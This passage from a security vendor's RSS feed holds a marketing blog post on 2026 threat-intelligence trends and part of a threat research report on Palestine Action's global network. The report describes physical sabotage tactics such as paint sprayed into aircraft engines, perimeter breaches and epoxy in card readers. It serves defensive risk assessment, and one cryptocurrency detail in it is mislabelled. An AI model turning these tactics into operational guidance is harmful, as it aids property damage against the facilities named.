        <p>The need for organizations to mature their threat intelligence capabilities is clear, but the road to get there isn’t always easy. Recorded Future’s <a href="https://pages.recordedfutureext.com/2025-State-of-Threat-Intelligence-Report.html">2025 State of Threat Intelligence Report</a> found that only 49% of enterprises currently consider their threat intelligence maturity as advanced, yet 87% expect to make significant progress in the next two years.</p>
        <p>This gap between today’s capabilities and tomorrow’s ambitions reflects a familiar challenge: organizations have plenty of threat data, but struggle to connect, automate, and operationalize it effectively across teams and tools.</p>
        <p>Based on insights from the report, here is what enterprises can expect when it comes to threat intelligence in 2026.</p>
        <h2>Key Trends Driving Threat Intelligence Evolution</h2>
        <p>There are several key trends set to shape threat intelligence in the coming year, and organizations wanting to prioritize maturity should be on the lookout for partners that embrace and evolve with these currents in mind.</p>
        <ul>
          <li><strong>Vendor Consolidation for Unified Intelligence:</strong> Enterprises are looking to reduce tool fragmentation by consolidating threat intelligence vendors and feeds into a single platform. A unified approach promises a “single source of truth,” making it easier to operationalize intelligence across the organization.</li>
          <li><strong>Deeper Integration into Security Workflows:</strong> Organizations want threat intelligence deeply embedded in their existing security stack rather than as a siloed feed. In fact, 25% of enterprises plan to integrate threat intelligence with additional workflows (e.g. IAM, fraud, GRC) in the next two years to broaden their reach.</li>
          <li><strong>Automation and AI Augmentation:</strong> To cope with accelerating threats and volumes of data, teams are embracing automation in threat intelligence. The future lies in machine-speed analysis that automatically correlates and enriches intelligence so analysts can focus on high-level judgment.</li>
          <li><strong>Fusion of Internal and External Data:</strong> Over a third of organizations (36%) plan to combine external threat intelligence with data from their own environment to gain better insight into risk posture (and even benchmark against peers).</li>
        </ul>
        <h2>Challenges Holding Teams Back Today</h2>
        <p>Despite this forward momentum, many enterprise teams still struggle with persistent challenges that hinder their threat intelligence efforts.</p>
        <ul>
          <li><strong>Integration Gaps:</strong> Fragmented ecosystems remain a top concern. Nearly half of organizations (48%) cite poor integration with existing security tools among their biggest pain points.</li>
          <li><strong>Credibility and Trust Issues:</strong> Data means little if analysts don’t trust the intelligence. Half of enterprises say verifying the credibility and accuracy of threat intelligence is a major challenge.</li>
          <li><strong>Signal-to-Noise Overload:</strong> With huge volumes of alerts and feeds, 46% of enterprises struggle to filter relevant insight from noise. This information overload hampers visibility into real threats, drains team efficiency, and contributes to analyst burnout.</li>
          <li><strong>Lack of Context for Action:</strong> Even when threat data is available, 46% of organizations lack the context needed to translate it into meaningful risk insights or actionable priorities.</li>
        </ul>
        <p>These barriers help explain why many programs plateau at an intermediate maturity. Teams may ingest more data sources over time, but still fall short on the automation, integration, and context needed for truly advanced, predictive intelligence.</p>
        <h2>Envisioning Threat Intelligence in 2026: Proactive, Integrated, and Business-Aligned</h2>
        <p>In the near future, leading enterprises will treat threat intelligence not as a side task but as a strategic function integrated into business processes. This means embedding threat insights directly into risk assessments, vulnerability management, and even board-level decisions on security (notably, 58% of organizations already use threat intelligence to guide business risk assessment decisions today).</p>
        <p>Instead of simply reacting to incidents after they occur, advanced threat intelligence programs will analyze patterns and emerging trends to warn of potential attacks before they fully materialize. This doesn’t mean magically “knowing the future,” but sharpening awareness by connecting subtle signals across many sources and mapping them to one’s environment.</p>
        <p>Human analysts will still be central for this kind of work, though their capabilities will be augmented by AI such that detection and response happen at machine speed. Intelligence platforms will automatically enrich new indicators, correlate them with ongoing events, and even trigger protective actions in real time—all with analysts overseeing the entire process.</p>
        <p>Ultimately, a mature program in 2026 will be measured by the outcomes it enables and the risk it reduces for the organization. This means protecting the assets, uptime, and reputation the business cares about, and improving decision quality at all levels of management.</p>
        <h2>Implications for 2026 Security Budgets and Investments</h2>
        <p>As threat intelligence becomes more central to security strategy, it’s also becoming a bigger line item in budgets. In fact, 91% of organizations plan to increase their threat intelligence spending in 2026, reflecting its critical role in an era of escalating cyber threats.</p>
        <p>One likely area for these increased funds is platform consolidation. Many teams are reevaluating their myriad point solutions and considering a move to more integrated platforms that unify multiple sources and use cases, reducing complexity and cost over time.</p>
        <p>Another likely investment will be in automation and AI capabilities. With cyber talent scarce and alert volumes ever-increasing, it will be vital to budget for tools that automate threat intelligence workflows end-to-end. From data collection and enrichment to triage and even initial response, automation will be key to doing more with the same team.</p>
        <div>
          <div>
            <div>After integrating Recorded Future into our Cyber Threat Intelligence (CTI) workflow… We reduced detection time by 40%, from an average of 48 hours to 28 hours. Incident response efficiency improved by 30%, as automated enrichment from Recorded Future replaced manual intelligence gathering. We also identified and mitigated 25% more threats compared to the previous quarter.</div>
          </div>
          <div>
            <div><strong>Cyber Threat Intelligence Specialist, Large Enterprise Professional Services Company</strong></div>
          </div>
        </div>
        <p>Organizations should also ensure that new investments deliver contextual intelligence tailored to their business. It’s not enough to simply buy more feeds or tools that spit out data; the value lies in solutions that fuse internal data with external threat feeds and apply analytics to highlight what matters most.</p>
        <p>That said, not every organization will have the same needs and challenges. The key to fully maximizing ROI will be aligning spending with the organization’s biggest gaps and pain points. If credibility of data is a major challenge, invest in sources with proven reliability or validation features. If integration is a key issue, focus spending on consolidation projects or appropriate vendor services.</p>
        <p>Security teams should also establish clear metrics (such as reduced incident response time or incidents prevented) to measure the impact of threat intelligence investments. For example, over half (54%) of organizations now measure success by improved detection and response times, making it a top metric for demonstrating value delivered by threat intelligence initiatives.</p>
        <h2>Charting the Course to 2026</h2>
        <p>Enterprise threat intelligence is undoubtedly maturing and becoming more ingrained in security programs, yet much work still remains. Nearly half of organizations may call themselves “advanced” today, but truly predictive, integrated intelligence at scale is still a goalpost ahead. In looking toward 2026, security leaders should double down on the fundamentals that drive intelligence maturity: integration, automation, and alignment with business priorities.</p>
        <p>By breaking down silos between tools and teams, trusting and acting on intelligence through improved data credibility and context, and continually measuring what works, teams can evolve from reactive defense to an anticipatory, intelligence-driven security posture.</p>
        <p>So what are some practical next steps? First, it’s wise to benchmark your organization’s current program to identify gaps and opportunities. Tools like <a href="https://www.recordedfuture.com/ko/resources/maturity-assessment">Recorded Future’s Threat Intelligence Maturity Assessment</a> provide a structured way to evaluate where you stand today and get tailored recommendations on how to improve.</p>
        <p>With that insight, you can develop a roadmap that includes the right people, process, and technology investments to operationalize threat intelligence in the most efficient way. Keep the big picture in mind: the ultimate aim is to see more threats, identify them faster, and take action to reduce risk before damage is done. With a thoughtful strategy and an eye towards these trends, organizations can chart a course from today’s challenges to a more proactive and resilient threat intelligence function in 2026 and beyond.</p>
      ]]></content:encoded>
            <category>Blog</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/ko/blog/media_18741ecd2e5bc1f72686d64726aaa4419be1e620f.png?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[Palestine Action: Operations and Global Network]]></title>
            <link>https://www.recordedfuture.com/ko/research/palestine-action-operations-and-global-network</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/ko/research/palestine-action-operations-and-global-network</guid>
            <pubDate>Thu, 11 Dec 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[Explores Palestine Action’s post-designation global network, tactics, and targets, and evaluates key physical risks and mitigations for organizations.]]></description>
            <content:encoded><![CDATA[
        <h2>Executive Summary</h2>
        <p>Palestine Action has almost certainly responded to its July 2025 designation as a terrorist organization in the United Kingdom (UK) by encouraging domestic violent extremists (DVEs) outside the UK with a nexus to the group to increase the scope and frequency of their operations, while abstaining from conducting or claiming attacks within the UK. Palestine Action’s dual-track strategy, very likely intended to maintain pressure on the multinational companies they target while avoiding complications to their legal efforts to contest the UK designation in court, almost certainly poses persistent physical threats to private and public sector facilities in Western Europe, North America, and Australia. Recent arrests of pro-Palestine Action protesters in the UK and events in the Israel-Hamas conflict have very likely prompted Palestine Action’s global network to more frequently conduct militant direct actions on behalf of Palestine Action’s interests.</p>
        <p>Palestine Action’s global network consists of pro-Palestinian activist groups that share the UK branch’s commitment to militant direct action and other core aspects of the group’s operational profile — such as motivating ideologies, preferred targets, area(s) of operation, or tactics, techniques, and procedures (TTPs). The most popular TTPs within the network are almost certainly those that Palestine Action’s UK branch has promoted or employed, including vandalizing the exterior of facilities with red paint or blunt instruments, obstructing facilities with “human chains” or large objects, and sabotaging valuable assets inside the perimeter of a facility. Defense contractors that provide services to Israel’s government or military are almost certainly the primary target of the Palestine Action global network, although the network has also frequently targeted insurance agencies, banks and financial entities, and shipping companies.</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Palestine Action’s July 2025 terrorism designation in the UK very likely broadened the geographic scope of its operations and potential targets, as activist groups in its global network outside the UK almost certainly have greater freedom of maneuver.</li>
          <li>Since October 7, 2023, events in the Israel-Hamas conflict, especially expansions of Israeli military activity or reports of humanitarian crises in the Gaza Strip, have prefigured physical attacks with a nexus to Palestine Action.</li>
          <li>The facilities of Western European, North American, and Australian defense contractors, banks, insurance companies, international shipping and logistics service providers, and government agencies — particularly those with a perceived relationship to Israel — very likely face elevated physical risks from Palestine Action’s global network.</li>
          <li>The most costly Palestine Action operations — some of which have caused several million dollars in damages to targeted organizations — very likely resulted from Palestine Action operatives breaching facilities’ secure perimeters.</li>
          <li>In the short to medium term, Palestine Action militant direct action in the UK is very likely to maintain a lower operational tempo until the group either succeeds in its effort to rescind its terrorism designation or exhausts all legal avenues to do so.</li>
        </ul>
        <h2>Palestine Action: History and Terrorism Designation</h2>
        <p>Palestine Action was <a href="https://web.archive.org/web/20210530081122/https://palestineaction.org/the-launch-of-palestine-action/">founded</a> in the UK in July 2020 by Huda Ammori and Richard Loxton-Barnard, longtime UK-based activists in the pro-Palestinian and environmental movements, respectively. The almost certain core purpose of Palestine Action is to <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">promote</a> militant direct action by pro-Palestinian activists around the world, particularly those who aim to disrupt the operations of government agencies, defense contractors, and private companies that supply Israel or the Israel Defense Forces (IDF). Historically, the group’s UK core has <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">focused</a> its efforts on targeting the Israeli multinational defense contractor Elbit Systems (Elbit), as well as its partners and subsidiaries. Like other domestic violent extremist (DVE) groups, Palestine Action and its individual global network groups very likely lack formal hierarchies, opting instead to function in the form of decentralized activist cells.</p>
        <p>Palestine Action very likely distinguishes between elements of the organization that focus on non-violent direct actions — such as protests, demonstrations, and political activity — and the organization’s covert cells dedicated to militant direct action. On August 2, 2023, the group announced the creation of “Palestine Action Underground,” its label for the group’s “covert missions,” and stated that its future militant direct actions would target “any business found to be collaborating with Elbit via their research, technology, consultation, labour, components, or any other service.” A March 2025 unclassified intelligence assessment from the UK’s Joint Terrorism Assessment Center (JTAC) <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">reported</a> that between July 2020 and March 2025, Palestine Action “conducted over 385 direct actions” in the UK, including both non-violent and militant direct actions. These actions have occurred throughout the UK, supporting JTAC’s assessment that the group has cells throughout the country, but police in the UK have reported higher degrees of Palestine Action-related activity in Greater London, as well as “Staffordshire, Greater Manchester, Leicestershire, Metropolitan, Kent, and Avon and Somerset.”</p>
        <p>The frequency and scope of Palestine Action’s operations in the UK almost certainly <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">increased</a> following the October 7, 2023, Hamas attack in Israel and the subsequent Israel-Hamas war in the Gaza Strip. <strong>Figure 1</strong> (below) shows references in the Recorded Future Intelligence Operations Platform to incidents of sabotage or vandalism in the UK involving Palestine Action between its 2020 founding and 2025 terrorism designation, annotated with significant events during the post-October 2023 Israel-Hamas conflict. In many instances, Palestine Action’s operations followed major developments in this conflict, such as expansions of Israeli military activity in the Gaza Strip or elsewhere in the Middle East, reports of humanitarian crises in Gaza, or the deaths of senior Hamas, Palestinian Islamic Jihad (PIJ), or Hezbollah figures in targeted airstrikes.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_149bfd2b732d8d0ef9b2dd07170bc16c93226b7c6.png?width=750&amp;format=png&amp;optimize=medium" width="1428" height="738" />
        </p>
        <p><em><strong>Figure 1</strong>: References to Palestine Action operations in the UK in the Recorded Future Intelligence Operations Platform alongside key developments in the Israel-Hamas conflict (Source: Recorded Future)</em></p>
        <p>The culmination of Palestine Action’s direct action campaign in the UK was a June 20, 2025, <a href="https://www.bbc.com/news/articles/cx24nppdx0lo">operation</a> in which several of the group’s members illegally breached the Royal Air Force (RAF) Brize Norton base in Oxfordshire, sprayed paint into the engines of two RAF Airbus A330 Multi Role Tanker Transport (MRTT) aerial refueling aircraft, and damaged the jets with crowbars. In total, the attack <a href="https://apnews.com/article/raf-brize-norton-palestine-action-planes-8467a20bcd088e24c3fe061852b33ba2">caused</a> over seven million pounds ($9.5 million) in damages and prompted calls for UK law enforcement agencies to crack down on Palestine Action. Three days after the attack, UK Home Secretary Yvette Cooper <a href="https://hansard.parliament.uk/commons/2025-06-23/debates/25062337000014/PalestineActionProscription">announced</a> the Home Office’s intent to proscribe Palestine Action under the UK’s Terrorism Act 2000. The UK Parliament approved the proscription with votes on July 2 and 3, 2025, and Palestine Action was officially <a href="https://www.legislation.gov.uk/uksi/2025/803/pdfs/uksiem_20250803_en_001.pdf">designated</a> a terrorist organization in the UK on July 5; this status prohibits individuals from joining, fundraising, or expressing support for Palestine Action, with legal penalties as severe as fourteen years in prison for being convicted of being a Palestine Action member.</p>
        <p>Palestine Action has almost certainly pursued a dual-track strategy in response to its designation in the UK, abstaining from major sabotage operations in the UK while inciting its global network to conduct these operations outside of the country. Insikt Group is not aware of significant incidents of sabotage connected to Palestine Action in the UK since its proscription. Instead, the group has attempted to legally <a href="https://www.bbc.com/news/articles/ce9dg5v43vmo">challenge</a> the ban and garner public support for its cause through a <a href="https://www.bbc.com/news/articles/ceq2e9x19g8o">series</a> of unlawful (due to Palestine Action’s proscription) but well-attended protests in which several thousand demonstrators have been arrested for expressing support for Palestine Action.</p>
        <p>However, the organization’s international network outside the UK has almost certainly taken responsibility for Palestine Action’s direct action campaigns, targeting defense contractors, militaries, and other industries perceived to be supporting Israel with sabotage, vandalism, and other disruptive physical threat activities despite the UK terrorism designation. In August 2025, Palestine Action’s official website deleted all of its content and posted a statement (<strong>Figure 2</strong>) claiming that “the website has been transferred to others in the global movement who are not active in Britain or British nationals.” The website now provides two ways for individuals to contribute to the organization: through its Monero (XRP) cryptocurrency wallet or through the website of its Italian franchise, Palestine Action Italia (also known as Palestina Libera). On September 8, 2025, a Palestine Action Global social media account began posting and announced the launch of the “Palestine Action Global” platform, indicating the organization’s belief that “Palestine Action is a global network taking direct action against the Israeli war machine.”</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_12151bbf3b847608b6c89f0a881a17286c50082ea.png?width=750&amp;format=png&amp;optimize=medium" width="1409" height="663" /><br /><em><strong>Figure 2:</strong></em> <em>Statement on Palestine Action website with cryptocurrency wallet information and link to Italian franchise (Source: Palestine Action)</em>
        </p>
        <p>Groups in Palestine Action’s network in North America, Europe, and Australia — as detailed below — are very likely to increase their operational tempo in response to the UK proscription of Palestine Action and ongoing developments in the Israel-Hamas conflict. In the short term, the frequency of direct action conducted by groups in Palestine Action’s global network is likely to outpace the parent organization in the UK, as it is likely to continue its <em>de facto</em> moratorium on sabotage and vandalism while it attempts to legally appeal its proscription. Nevertheless, Palestine Action will very likely attempt to continue providing support to its international network through organizing trainings for activists, sharing instructional material, and using its platform to advertise the activities of the network around the world.</p>
        <h2>Palestine Action’s Tactics, Techniques, Procedures, and Targets</h2>
        <p>Palestine Action’s UK branch and its global network almost certainly rely on standard operating procedures for conducting attacks against facilities to disrupt the business operations of their intended targets. Specifically, DVEs associated with the group almost certainly prefer TTPs for attacks that are described in Palestine Action’s 2023 instructional guide to carrying out militant direct actions in support of the group’s objectives. Namely, Palestine Action and its global network have frequently and repeatedly used the same vandalism, physical obstruction, and sabotage TTPs in operations, as described in the following section. DVEs with a nexus to Palestine Action very likely select which TTP to employ in operations based on their level of access to the targeted facility in question, conducting more destructive and sophisticated attacks when they are able to gain interior access.</p>
        <p>Across the globe, the primary targets of Palestine Action and similar groups are almost certainly the offices of defense contractors that have perceived relationships with the IDF or the Israeli government. In the UK and Western Europe, Elbit and its subsidiaries and partners have been most frequently targeted in Palestine Action attacks. However, due to the global footprint of Palestine Action’s network and the expansion of the Israel-Hamas conflict since October 2023, Palestine Action and similar groups have also attacked entities in other sectors that are perceived to be doing business with the IDF, the Israeli government, or Elbit. Aside from defense contractors and governments, the most frequently targeted industry sectors are insurance, banks and financing, logistics, and shipping.</p>
        <h3>Direct Action TTPs</h3>
        <p>Palestine Action almost certainly uses physical attack TTPs that are intended to maximize the degree of economic disruption and damage to targeted facilities, but minimize the risks of harm to individuals and detection by law enforcement. By imposing financial cost on targeted companies during operations, Palestine Action almost certainly seeks to convince the targeted entity to sever its relationships with the IDF or Israeli government. Insikt Group associates the following overarching TTPs with attacks perpetrated by Palestine Action or its global network:</p>
        <ul>
          <li>Palestine Action operations are typically carried out by small cells, mostly consisting of fewer than five activists.</li>
          <li>Palestine Action conducts targeted operations against facilities outside of business hours to maintain operational security and minimize the risks of harm to personnel or the identification/detection of its operatives.</li>
          <li>Palestine Action operations aim to impose substantial financial costs on targeted entities through rudimentary, low-sophistication methods.</li>
          <li>Palestine Action operatives prefer vandalism, obstruction, and sabotage as TTPs; which TTP is selected is very likely contingent on the degree of access to the facility.
            <ul>
              <li>If operatives cannot gain entry to the facility, they will very likely prefer to vandalize the exterior of the facility or attempt to block external entry.</li>
              <li>If operatives are able to gain internal access to the facility — usually by identifying and exploiting potential access points during pre-attack reconnaissance or by using physical force to enter — they will very likely attempt to sabotage infrastructure inside the facility.</li>
            </ul>
          </li>
        </ul>
        <h4>Vandalism</h4>
        <p>Almost all observed Palestine Action operations involve vandalism of the exterior of targeted facilities, with two types of actions especially prominent. First, DVEs affiliated with Palestine Action have frequently used red spray paint to either indiscriminately color or write messages on the facades of targeted facilities, or, by dispersing paint through a fire extinguisher, blanketing the exterior or interior of a facility with red paint. Second, these DVEs use tools or projectiles, including hammers, crowbars, blunt objects, and bricks, to destroy windows on the exterior of targeted buildings.</p>
        <p>These vandalism methods are each attested to in Palestine Action’s official instructional guide as effective ways to “destrupt [sic], damage or destroy your target.” The manual also recommends that DVEs use the same vandalism TTPs to damage exterior surveillance systems in order to avoid detection during direct actions, or to destroy infrastructure such as air conditioning systems or pipes outside the facility to “sabotage the profits of your target even further.”</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_10e806cffcc88b90ce3d873718b05e1904a5c2fb0.png?width=750&amp;format=png&amp;optimize=medium" width="934" height="502" />
        </p>
        <p><em><strong>Figure 3</strong>: Evidence of vandalism TTPs from a February 2025 Palestine Action attack against an Allianz insurance office in Milton Keynes, UK (Source: Palestine Action)</em></p>
        <h4>Obstruction</h4>
        <p>Palestine Action operations have also used physical obstruction as a TTP to prevent access to targeted facilities. Unlike other attack TTPs associated with Palestine Action, the group has often used methods of obstructing facilities that are very unlikely to be intended to maintain the covert nature of the operation. Specifically, in some operations, Palestine Action cells have physically obstructed access to targeted facilities by forming a human blockade: sitting down, interlocking arms, blocking access to a main doorway, and on occasion chaining themselves together or to an immovable object (such as a vehicle or post). In a break from the patterns of other observed Palestine Action TTPs, activists have attempted blockades during normal business hours, mainly to prevent facility employees from entering the premises.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c0b3ea7939281ba6720a594996ce304846f148cf.png?width=750&amp;format=png&amp;optimize=medium" width="800" height="450" />
        </p>
        <p><em><strong>Figure 4:</strong></em> <em>Palestine Action activists blockade a Lockheed Martin facility in Bedfordshire, UK, in a November 2023 protest (Source:</em> <em><a href="https://www.bbc.com/news/uk-england-beds-bucks-herts-67519517">BBC</a>)</em></p>
        <p>Palestine Action network groups — particularly in the United States (US) — have also experimented with more novel methods of facility obstruction that can be covertly conducted. Cells with a nexus to the US-based Palestine Action offshoot Unity of Fields (UoF), for instance, launched a campaign in the summer and fall of 2024 to target Citibank automated teller machine (ATM) locations in the New York and Los Angeles metropolitan areas due to the bank’s perceived support of Israeli interests. In addition to vandalizing the facilities, the cells inserted epoxy and affixed cement-glue stickers to exterior card-reader devices that were necessary to enter the facilities. Palestine Action’s instructional guide also calls for activists to use concrete to plug water or sewage pipes leading to targeted facilities, although Insikt Group has not observed Palestine Action operatives using this TTP.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_13c10409dc1a57c4f5f1e968bab131a61780ca022.png?width=750&amp;format=png&amp;optimize=medium" width="675" height="900" />
        </p>
        <p><em><strong>Figure 5:</strong></em> <em>Activists insert epoxy into a Citibank card reader in New York City on October 7, 2024 (Source: Unity of Fields)</em></p>
        <h4>Sabotage</h4>
        <p>Sabotage operations remain the most likely of the TTPs historically employed by Palestine Action to impose serious financial costs on the victims of its operations. While almost certainly relying on low-tech and low-sophistication methods, Palestine Action has caused millions of dollars in damages through sabotage operations, mainly to technology and other assets inside targeted facilities. In previous incidents, cells linked to Palestine Action have relied on the same toolkit used for vandalism and obstruction — large, blunt objects like crowbars and wrenches and fire extinguishers filled with paint — to sabotage their target. Activists almost certainly prefer these tools due to their low cost, ease of use, minimal profile, and the inability to trace their purchase; their use across the spectrum of Palestine Action’s TTPs likely suggests that activists are opportunistic, employing the toolkit in sabotage operations as opposed to vandalism or obstruction when they can exploit vulnerabilities in facility security.</p>
        <p>The most notable and recent sabotage incident connected to Palestine Action was the aforementioned breach of RAF Brize Norton, the largest RAF base in the UK, on June 20, 2025. A video of this attack posted by the group <a href="https://www.bbc.com/news/videos/czxwvp7lykko">shows</a> activists approaching Airbus A330s on the base using electric scooters. They damaged the aircraft by spraying red paint through a fire extinguisher directly into the plane’s engines and striking the plane with crowbars. The attack caused approximately £7 million ($9.4 million) in damages to the aircraft, almost certainly <a href="https://covertaccessteam.substack.com/p/the-raf-brize-norton-breach-what">due</a> to the impact of the attack on sensitive parts and equipment inside the planes’ engines. The attack on RAF Brize Norton <a href="https://www.reuters.com/business/aerospace-defense/four-pro-palestinian-activists-charged-over-uk-military-base-break-in-2025-07-03/">led</a> to the arrest and indictment of five Palestine Action-linked activists and almost certainly prompted the UK terrorism designation of the group, as well as improvements to facility and perimeter security at the RAF base.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_1c315d371b4cb1477f8fe5f99e66778bb49f47d21.png?width=750&amp;format=png&amp;optimize=medium" width="465" height="262" />
        </p>
        <p><em><strong>Figure 6:</strong></em> <em>Palestine Action activists approach aircraft at RAF Brize Norton on electric scooters (Source: Palestine Action)</em></p>
        <p>Palestine Action activists also deployed sabotage TTPs on several additional operations targeting defense contractors in the UK. In August 2024, a Palestine Action cell in Bristol <a href="https://www.reuters.com/world/uk/nine-deny-attack-israeli-firm-elbits-uk-warehouse-2025-01-17/">breached</a> an Elbit warehouse by piloting a van through perimeter fencing, entered the facility, and began sabotaging internal equipment within the facility with sledgehammers, axes, and other blunt instruments. In total, the operation <a href="https://www.reuters.com/world/uk/nine-deny-attack-israeli-firm-elbits-uk-warehouse-2025-01-17/">caused</a> over £1 million ($1.3 million) in damages; protesters also allegedly assaulted a security guard and law enforcement officers responding to the incident, prompting JTAC to <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">label</a> the attack as an “act of terrorism.” During a June 1, 2022, incident at a Thales Group facility in Glasgow, Palestine Action activists <a href="https://www.bbc.com/news/articles/c9wj144zd7po">accessed</a> the roof and entered the facility, destroying parts used for submarines with blunt instruments. In conjunction with the sabotage operation, two protesters glued themselves to the roof, likely attempting to obstruct access to the facility.</p>
        <h3>Targets</h3>
        <p>Palestine Action’s <a href="https://newleftreview.org/sidecar/posts/tactics-of-disruption">primary target</a> in the UK has almost certainly been Elbit: the global defense contractor has been the most frequent victim of its attacks, the group’s propaganda and instructional material list Elbit as the group’s preferred target, and Palestine Action has launched branded campaigns designed specifically to encourage activists to attack Elbit facilities. As secondary targets, the group has <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">conducted</a> notable attacks against other public and private sector defense entities perceived to have some association with the Israeli military, namely the UK’s Ministry of Defence (MoD), Teledyne Technologies, Thales Group, Leonardo, and Rafael Advanced Defense Systems. According to its 2023 announcement and its post-October 7, 2023, activity, the group and its international network consider a range of entities in sectors that reportedly supply goods or services to Elbit or the Israeli military — including banks, financial institutions, insurance agencies, real estate brokers, accounting firms, human resources contractors, and international shipping and logistics companies — as legitimate targets for militant direct action. Direct actions have also <a href="https://static01.nyt.com/newsgraphics/documenttools/c8fe6a933eb1bb7b/70535e60-full.pdf">targeted</a> other UK government entities, including the UK Foreign and Commonwealth Office, the BBC, and the London Stock Exchange. Palestine Action almost certainly targets these companies with the goal of inflicting maximum financial and reputational damage through its operations, in order to convince companies to cease their business with Elbit or Israeli entities.</p>
        <p>As the next section demonstrates, the international expansion of Palestine Action network groups adopting the UK branch’s modus operandi or TTPs has almost certainly broadened the range of secondary and tertiary targets that are likely to be affected by militant direct action campaigns. However, Palestine Action and its global network very likely share a focus on specific sectors — defense contracting, banking, insurance, and international shipping and logistics — that relevant groups and cells are likely to target regardless of their respective area of operations. Moreover, the TTPs Insikt Group associates with Palestine Action’s UK branch have almost certainly been adopted by its international counterparts, very likely due to the influence of Palestine Action’s militant direct action campaigns in the UK, instructional material, and training sessions for activists.</p>
        <h2>Palestine Action’s Global Network</h2>
        <p>Palestine Action’s global network consists of groups of activists around the world who share Palestine Action UK’s commitment to disrupting the normal business operations of entities partnered with the State of Israel through militant direct action. Some of these groups refer or have referred to themselves explicitly as “Palestine Action”; have direct relationships to the UK branch through their members, partners, or benefactors; choose identical targets, such as Elbit; or, like Palestine Action UK, are solely motivated by the anti-Israel cause. Others, despite lacking these relationships, have directly appropriated Palestine Action UK’s TTPs, targets, or other aspects of the organization to support their own operations.</p>
        <p>We classify groups in Palestine Action’s global network based on which elements they share in common with the UK branch. As depicted in <strong>Table 1</strong>, our four-part classification labels Palestine Action network groups as either Palestine Action <strong>franchises</strong>, <strong>affiliates</strong>, <strong>offshoots</strong>, or <strong>partners</strong>, depending on whether they share areas of operation, motivating ideology, TTPs, or targets with the UK branch. These categories are not static and are subject to change over time, particularly as groups founded as Palestine Action franchises outside the UK adapt to the local landscape in their own countries and form their own brand. Table 1 additionally contains examples of each of the four categories of Palestine Action network groups, with the following subsections containing case studies of particularly notable franchise, affiliate, offshoot, and partner groups.</p>
        <div>
          <div>
            <div><strong>Label</strong></div>
            <div><strong>Nexus</strong></div>
            <div><strong>Distinction</strong></div>
            <div><strong>Examples</strong></div>
          </div>
          <div>
            <div><strong>Franchise</strong></div>
            <div>Ideology, TTPs, targets</div>
            <div>Area of operation</div>
            <div>Palestina Libera (Italy), Palestine Action Germany, Palestine Action Sweden, Palestine Action Eire (Ireland), Palestine Action Belgium, Palestine Action NL, Palestine Action Norway, Palestine Action Canada, Palestine Action Group Canberra (Australia), Palestine Action Tunisia</div>
          </div>
          <div>
            <div><strong>Affiliate</strong></div>
            <div>Ideology, TTPs</div>
            <div>Area of operation, targets</div>
            <div>Death to Toll (Australia)</div>
          </div>
          <div>
            <div><strong>Offshoot</strong></div>
            <div>Ideology, targets</div>
            <div>Area of operation, TTPs</div>
            <div>Unity of Fields (US), Shut Elbit Down (Germany/Austria)</div>
          </div>
          <div>
            <div><strong>Partner</strong></div>
            <div>Area of operation, TTPs</div>
            <div>Ideology, targets</div>
            <div>Shut the System (UK)</div>
          </div>
        </div>
        <p><em><strong>Table 1:</strong></em> <em>Classification of Palestine Action global network groups (Source: Insikt Group)</em></p>
        <h3>Franchise: Palestine Action Italia/Palestina Libera (Italy)</h3>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/ko/media_122ef6d2b5fa1ff9c7d344d1035840e3cfe5798d2.png?width=750&amp;format=png&amp;optimize=medium" width="606" height="115" />
        </p>
        <p><em><strong>Figure 7:</strong></em> <em>Palestine Action Italia logo (Source: Palestine Action Italia)</em></p>
        <p>Palestine Action Italia, more commonly known as Palestina Libera, is Palestine Action’s Italy-based franchise. On its website, the group directly identifies itself as “the Italian branch of the international ‘Palestine Action’ campaign, which in England directly led to the closure of three arms factories involved in the genocide in Gaza.” The group also uses branding similar to that of the UK branch, employs similar TTPs, and targets the same sectors, focusing largely on defense contractors with facilities in Italy. In particular, Palestina Libera’s direct actions have frequently targeted the Italy-based defense contractor Leonardo at its offices throughout the country, due to its joint ventures with Elbit.</p>
        <p>The organization very likely emerged from pro-Palestinian activist factions in Italy that increasingly aligned with Palestine Action’s global network in the wake of the October 7, 2023, attack. While data in the Recorded Future Platform indicates the group’s website was registered on February 4, 2024, a 2008 <a href="https://badil.org/phocadownload/Badil_docs/publications/al-majdal-38.pdf">issue</a> of al-Majdal Magazine — the quarterly publication of the BADIL Resource Center for Palestinian Residency &amp; Refugee Rights — indicates that the same domain was operated by an Italian pro-Palestinian organization, the Comitato di Solidarietà con il Popolo Palestinese, Torino [Committee for Solidarity with the Palestinian People in Turin, Italy]. Screenshots of the domain captured in the Wayback Machine indicate that between October 2010 and the website’s registration in February 2024, the site displayed a message indicating the administrator should “upload [their] website into the public_html directory.” This message almost certainly indicates that an administrator account was active during the interim, but that it had not uploaded any information onto the domain. The group’s active social media accounts were created in November and December 2023.</p>
